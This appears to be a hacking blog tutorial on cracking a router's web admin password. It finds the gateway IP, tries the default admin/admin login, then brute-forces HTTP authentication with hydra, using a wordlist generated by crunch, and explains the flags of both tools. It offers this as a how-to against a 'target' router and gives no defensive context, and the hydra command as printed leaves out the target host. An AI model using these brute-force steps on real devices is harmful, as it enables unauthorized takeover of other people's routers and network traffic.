Cracking Router Password

Good evening visitors Art Of Explo1t =))
This time I will discuss how  to get a router password .

A router is a device that mediates the packets between computer networks with other computers, creating interwork overlay networks as well as drive traffic.  I shall illustrate an example like this:

when data packets are in a row then the router will read the address information in the packet and direct the final destination. in other words, the router directs network traffic.

can you imagine if someone attackers can take over your router and change the network traffic.

but here I did not teach it, which I will explain how an attacker managed to break the password.

oke, Let's Rock

now. find target route ip address with command :
# route

Done, gateway uses the ip address
Now, open the ip address using your favorite web browser. and here I using elinks as a web browser

then I tried using the default login
username: admin
password: admin

The password does not work. then we can perform brute forcing using hydra

# hydra -l admin -P /path/your/wordlists/dictionary.lst -e ns -s 80 -f -V http-get /

-l = login
-P = passwordlist
-e =  "n" null password : "s" login as pass
-s = port
-frun TASKS number of connects in parallel
-Vshow login+pass for each attempt / debug mode

for finish

we did not find a suitable password to login. what should we do?
we can make to get the password wordlist using crunch =))

# crunch 5 6 abcd1234 -o /root/Desktop/pass-list.lst

5 = minimum length of characters
6 = maximal length of characters
abcd1234character that I use
-o /root/Desktop/pass-list.lst = I store the result in the Desktop by name pass-list.lst

then the result will be like this:

approximately 192412 words are formed by the crunch, hopefully we get the password ;))

# hydra -l admin -P /root/Desktop/pass-list.lst -e ns -s 80 -f -V http-get /

yeah. i think we successfully get a password router

username : admin
password : abc123

now. back to in your web browser and open the ip address :

Hidemichi-Hiroyuki a.k.a [H2]


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